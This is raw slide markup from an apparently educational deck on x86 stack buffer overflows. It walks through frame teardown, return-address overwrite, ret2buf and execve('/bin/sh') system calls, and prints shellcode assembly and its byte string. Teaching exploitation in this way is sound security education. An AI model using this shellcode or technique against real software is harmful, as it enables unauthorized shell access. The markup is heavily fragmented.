              <a:gd name="connsiteX0" fmla="*/ 508000 w 1367174"/>
              <a:gd name="connsiteY0" fmla="*/ 16544 h 1301485"/>
              <a:gd name="connsiteX1" fmla="*/ 343647 w 1367174"/>
              <a:gd name="connsiteY1" fmla="*/ 91250 h 1301485"/>
              <a:gd name="connsiteX2" fmla="*/ 283883 w 1367174"/>
              <a:gd name="connsiteY2" fmla="*/ 106191 h 1301485"/>
              <a:gd name="connsiteX3" fmla="*/ 239059 w 1367174"/>
              <a:gd name="connsiteY3" fmla="*/ 121132 h 1301485"/>
              <a:gd name="connsiteX4" fmla="*/ 179294 w 1367174"/>
              <a:gd name="connsiteY4" fmla="*/ 165956 h 1301485"/>
              <a:gd name="connsiteX5" fmla="*/ 89647 w 1367174"/>
              <a:gd name="connsiteY5" fmla="*/ 225721 h 1301485"/>
              <a:gd name="connsiteX6" fmla="*/ 74706 w 1367174"/>
              <a:gd name="connsiteY6" fmla="*/ 285485 h 1301485"/>
              <a:gd name="connsiteX7" fmla="*/ 44824 w 1367174"/>
              <a:gd name="connsiteY7" fmla="*/ 315368 h 1301485"/>
              <a:gd name="connsiteX8" fmla="*/ 29883 w 1367174"/>
              <a:gd name="connsiteY8" fmla="*/ 405015 h 1301485"/>
              <a:gd name="connsiteX9" fmla="*/ 0 w 1367174"/>
              <a:gd name="connsiteY9" fmla="*/ 494662 h 1301485"/>
              <a:gd name="connsiteX10" fmla="*/ 44824 w 1367174"/>
              <a:gd name="connsiteY10" fmla="*/ 927956 h 1301485"/>
              <a:gd name="connsiteX11" fmla="*/ 59765 w 1367174"/>
              <a:gd name="connsiteY11" fmla="*/ 972780 h 1301485"/>
              <a:gd name="connsiteX12" fmla="*/ 119530 w 1367174"/>
              <a:gd name="connsiteY12" fmla="*/ 1047485 h 1301485"/>
              <a:gd name="connsiteX13" fmla="*/ 179294 w 1367174"/>
              <a:gd name="connsiteY13" fmla="*/ 1107250 h 1301485"/>
              <a:gd name="connsiteX14" fmla="*/ 194235 w 1367174"/>
              <a:gd name="connsiteY14" fmla="*/ 1152074 h 1301485"/>
              <a:gd name="connsiteX15" fmla="*/ 298824 w 1367174"/>
              <a:gd name="connsiteY15" fmla="*/ 1196897 h 1301485"/>
              <a:gd name="connsiteX16" fmla="*/ 343647 w 1367174"/>
              <a:gd name="connsiteY16" fmla="*/ 1226780 h 1301485"/>
              <a:gd name="connsiteX17" fmla="*/ 403412 w 1367174"/>
              <a:gd name="connsiteY17" fmla="*/ 1241721 h 1301485"/>
              <a:gd name="connsiteX18" fmla="*/ 493059 w 1367174"/>
              <a:gd name="connsiteY18" fmla="*/ 1271603 h 1301485"/>
              <a:gd name="connsiteX19" fmla="*/ 582706 w 1367174"/>
              <a:gd name="connsiteY19" fmla="*/ 1301485 h 1301485"/>
              <a:gd name="connsiteX20" fmla="*/ 1090706 w 1367174"/>
              <a:gd name="connsiteY20" fmla="*/ 1271603 h 1301485"/>
              <a:gd name="connsiteX21" fmla="*/ 1180353 w 1367174"/>
              <a:gd name="connsiteY21" fmla="*/ 1241721 h 1301485"/>
              <a:gd name="connsiteX22" fmla="*/ 1210235 w 1367174"/>
              <a:gd name="connsiteY22" fmla="*/ 1211838 h 1301485"/>
              <a:gd name="connsiteX23" fmla="*/ 1255059 w 1367174"/>
              <a:gd name="connsiteY23" fmla="*/ 1196897 h 1301485"/>
              <a:gd name="connsiteX24" fmla="*/ 1299883 w 1367174"/>
              <a:gd name="connsiteY24" fmla="*/ 1137132 h 1301485"/>
              <a:gd name="connsiteX25" fmla="*/ 1344706 w 1367174"/>
              <a:gd name="connsiteY25" fmla="*/ 1032544 h 1301485"/>
              <a:gd name="connsiteX26" fmla="*/ 1344706 w 1367174"/>
              <a:gd name="connsiteY26" fmla="*/ 434897 h 1301485"/>
              <a:gd name="connsiteX27" fmla="*/ 1299883 w 1367174"/>
              <a:gd name="connsiteY27" fmla="*/ 375132 h 1301485"/>
              <a:gd name="connsiteX28" fmla="*/ 1255059 w 1367174"/>
              <a:gd name="connsiteY28" fmla="*/ 285485 h 1301485"/>
              <a:gd name="connsiteX29" fmla="*/ 1165412 w 1367174"/>
              <a:gd name="connsiteY29" fmla="*/ 225721 h 1301485"/>
              <a:gd name="connsiteX30" fmla="*/ 1090706 w 1367174"/>
              <a:gd name="connsiteY30" fmla="*/ 165956 h 1301485"/>
              <a:gd name="connsiteX31" fmla="*/ 1001059 w 1367174"/>
              <a:gd name="connsiteY31" fmla="*/ 106191 h 1301485"/>
              <a:gd name="connsiteX32" fmla="*/ 851647 w 1367174"/>
              <a:gd name="connsiteY32" fmla="*/ 46427 h 1301485"/>
              <a:gd name="connsiteX33" fmla="*/ 806824 w 1367174"/>
              <a:gd name="connsiteY33" fmla="*/ 31485 h 1301485"/>
              <a:gd name="connsiteX34" fmla="*/ 732118 w 1367174"/>
              <a:gd name="connsiteY34" fmla="*/ 16544 h 1301485"/>
              <a:gd name="connsiteX35" fmla="*/ 687294 w 1367174"/>
              <a:gd name="connsiteY35" fmla="*/ 1603 h 1301485"/>
              <a:gd name="connsiteX36" fmla="*/ 567765 w 1367174"/>
              <a:gd name="connsiteY36" fmla="*/ 1603 h 13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67174" h="1301485">
                <a:moveTo>
                  <a:pt x="508000" y="16544"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="447040" y="47024"/>
                  <a:pt x="407086" y="70104"/>
                  <a:pt x="343647" y="91250"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="324166" y="97744"/>
                  <a:pt x="303627" y="100550"/>
                  <a:pt x="283883" y="106191"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="268739" y="110518"/>
                  <a:pt x="254000" y="116152"/>
                  <a:pt x="239059" y="121132"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="219137" y="136073"/>
                  <a:pt x="199695" y="151676"/>
                  <a:pt x="179294" y="165956"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="149872" y="186551"/>
                  <a:pt x="89647" y="225721"/>
                  <a:pt x="89647" y="225721"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="84667" y="245642"/>
                  <a:pt x="83889" y="267118"/>
                  <a:pt x="74706" y="285485"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="68406" y="298085"/>
                  <a:pt x="49770" y="302178"/>
                  <a:pt x="44824" y="315368"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="34187" y="343734"/>
                  <a:pt x="37231" y="375625"/>
                  <a:pt x="29883" y="405015"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="22243" y="435573"/>
                  <a:pt x="9961" y="464780"/>
                  <a:pt x="0" y="494662"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16234" y="697579"/>
                  <a:pt x="2102" y="778427"/>
                  <a:pt x="44824" y="927956"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="49151" y="943100"/>
                  <a:pt x="52722" y="958693"/>
                  <a:pt x="59765" y="972780"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="78613" y="1010477"/>
                  <a:pt x="91735" y="1019691"/>
                  <a:pt x="119530" y="1047485"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="159373" y="1167017"/>
                  <a:pt x="99608" y="1027563"/>
                  <a:pt x="179294" y="1107250"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="190430" y="1118387"/>
                  <a:pt x="183098" y="1140937"/>
                  <a:pt x="194235" y="1152074"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="212698" y="1170537"/>
                  <a:pt x="272036" y="1187968"/>
                  <a:pt x="298824" y="1196897"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="313765" y="1206858"/>
                  <a:pt x="327142" y="1219706"/>
                  <a:pt x="343647" y="1226780"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="362521" y="1234869"/>
                  <a:pt x="383743" y="1235820"/>
                  <a:pt x="403412" y="1241721"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="433582" y="1250772"/>
                  <a:pt x="463177" y="1261642"/>
                  <a:pt x="493059" y="1271603"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="582706" y="1301485"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="752039" y="1291524"/>
                  <a:pt x="921922" y="1288481"/>
                  <a:pt x="1090706" y="1271603"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1122048" y="1268469"/>
                  <a:pt x="1180353" y="1241721"/>
                  <a:pt x="1180353" y="1241721"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1190314" y="1231760"/>
                  <a:pt x="1198156" y="1219086"/>
                  <a:pt x="1210235" y="1211838"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1223740" y="1203735"/>
                  <a:pt x="1242960" y="1206980"/>
                  <a:pt x="1255059" y="1196897"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1274189" y="1180955"/>
                  <a:pt x="1286685" y="1158249"/>
                  <a:pt x="1299883" y="1137132"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1326259" y="1094931"/>
                  <a:pt x="1330182" y="1076117"/>
                  <a:pt x="1344706" y="1032544"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1368060" y="799004"/>
                  <a:pt x="1380616" y="740137"/>
                  <a:pt x="1344706" y="434897"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1341796" y="410166"/>
                  <a:pt x="1314824" y="395054"/>
                  <a:pt x="1299883" y="375132"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1289225" y="343161"/>
                  <a:pt x="1282317" y="309336"/>
                  <a:pt x="1255059" y="285485"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1228031" y="261835"/>
                  <a:pt x="1165412" y="225721"/>
                  <a:pt x="1165412" y="225721"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1110199" y="142899"/>
                  <a:pt x="1167121" y="208409"/>
                  <a:pt x="1090706" y="165956"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1059311" y="148515"/>
                  <a:pt x="1040902" y="126113"/>
                  <a:pt x="1001059" y="106191"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="961216" y="86270"/>
                  <a:pt x="884019" y="58878"/>
                  <a:pt x="851647" y="46427"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="819275" y="33976"/>
                  <a:pt x="822103" y="35305"/>
                  <a:pt x="806824" y="31485"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="782187" y="25326"/>
                  <a:pt x="756755" y="22703"/>
                  <a:pt x="732118" y="16544"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="716839" y="12724"/>
                  <a:pt x="702979" y="3029"/>
                  <a:pt x="687294" y="1603"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="647615" y="-2004"/>
                  <a:pt x="607608" y="1603"/>
                  <a:pt x="567765" y="1603"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln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8780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rame teardown—1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=&gt; 0x080483ff </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>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corrupted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overwritten</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Folded Corner 15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u="sng" dirty="0" err="1" smtClean="0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u="sng" dirty="0" smtClean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u="sng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u="sng" dirty="0" smtClean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u="sng" dirty="0" err="1" smtClean="0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u="sng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7580"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6521704" y="1479548"/>
          <a:ext cx="1461558" cy="183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8003947" y="2819400"/>
            <a:ext cx="1032104" cy="923330"/>
            <a:chOff x="7959243" y="3138173"/>
            <a:chExt cx="1032104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138173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  <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t>and</a:t>
              </a:r>
            </a:p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61831" y="2949600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overwritten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1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rame teardown—2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0x080483ff &lt;+27&gt;:	leave</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty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2147"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6521704" y="1479548"/>
          <a:ext cx="1461558" cy="1468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743200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corrupted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61831" y="2580217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overwritten</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0"/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1322308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leave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,%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pPr marL="457200" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>pop %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng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000" u="sng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5835650" y="3180100"/>
            <a:ext cx="2819400" cy="4775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rtlCol="0" anchor="t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ambria"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>AAAA</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" i="1" dirty="0" smtClean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5282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rame teardown—3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#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>include&lt;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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>**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Dump </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>of assembler code for function main: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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>$72,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>%esp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12(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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>,4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>-64(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u="sng" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>0x08048400 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" u="sng" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;+28&gt;:	ret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0862"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6521704" y="1479548"/>
          <a:ext cx="1461558" cy="1101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003947" y="2389812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30453" y="2221468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corrupted</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Folded Corner 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5835650" y="3810000"/>
            <a:ext cx="2819400" cy="955000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%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eip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0xDEADBEEF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cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(probably crash)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16430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143000"/>
            <a:ext cx="6629400" cy="541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u="sng" dirty="0" smtClean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 smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>strcpy@plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" u="sng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0x08048400 &lt;+28&gt;:	ret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ret2buf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Traditionally,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>we inject assembly</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>instructions for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>exec(“/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>”)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into buffer.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ee “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0"/>
              <a:t>Smashing the stack for</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0"/>
              <a:t>fun and profit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>” for exact string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>or search online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3314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</a:rPr>
                        <a:t>shellcode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5898896" y="2743200"/>
            <a:ext cx="1187704" cy="2819400"/>
          </a:xfrm>
          <a:prstGeom prst="arc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 5378754"/>
              <a:gd name="adj2" fmla="val 16251393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08209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using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sysenter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is faster, but this is the traditional explanation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2506" y="1682859"/>
            <a:ext cx="5978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Put </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> number in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty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 up </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>arg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> 1 in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>arg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> 2 in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>arg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> 3 in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty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Call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0x80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:cs typeface="Cambria"/>
              </a:rPr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cs typeface="Cambria"/>
              </a:rPr>
              <a:t>System call runs. Result in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:cs typeface="Cambri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860" y="1295400"/>
            <a:ext cx="6086281" cy="8382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execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(“/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”, 0, 0);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24176" y="2438400"/>
            <a:ext cx="1743624" cy="838199"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -110292"/>
              <a:gd name="adj2" fmla="val 1435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execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is 0xb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162800" y="3581400"/>
            <a:ext cx="1905000" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -193178"/>
              <a:gd name="adj2" fmla="val -5687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addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ebx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0 in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ecx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0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104E-7 2.7698E-6 L 2.81104E-7 0.135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Author: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0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295400"/>
            <a:ext cx="3276600" cy="4343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en-US" sz="2800" dirty="0"/>
              <a:t>push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de-DE" sz="2800" dirty="0"/>
              <a:t>push 0x68732f2f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>push 0x6e69622f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esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="sk-SK" sz="2800" dirty="0"/>
              <a:t>mov al, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK" sz="2800" dirty="0" smtClean="0"/>
              <a:t>0xb</a:t>
            </a:r>
            <a:endParaRPr lang="sk-SK" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" sz="2800" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2800" dirty="0"/>
              <a:t> 0x80</a:t>
            </a:r>
          </a:p>
          <a:p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0870" y="2667000"/>
            <a:ext cx="5181600" cy="13716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da-DK" sz="2000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"\x31\xc9\xf7\xe1\x51\x68\x2f\x2f”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" sz="2000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"\x73\x68\x68\x2f\x62\x69\x6e\x89”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" sz="2000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"\xe3\xb0\x0b\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>\x80”;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5712767"/>
            <a:ext cx="144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Shellcode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191000"/>
            <a:ext cx="2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 String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096000" y="1295400"/>
            <a:ext cx="2590800" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -36607"/>
              <a:gd name="adj2" fmla="val 8650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Notice no NULL chars. Why?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7564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Author: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0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74186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Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>stdio.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>string.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
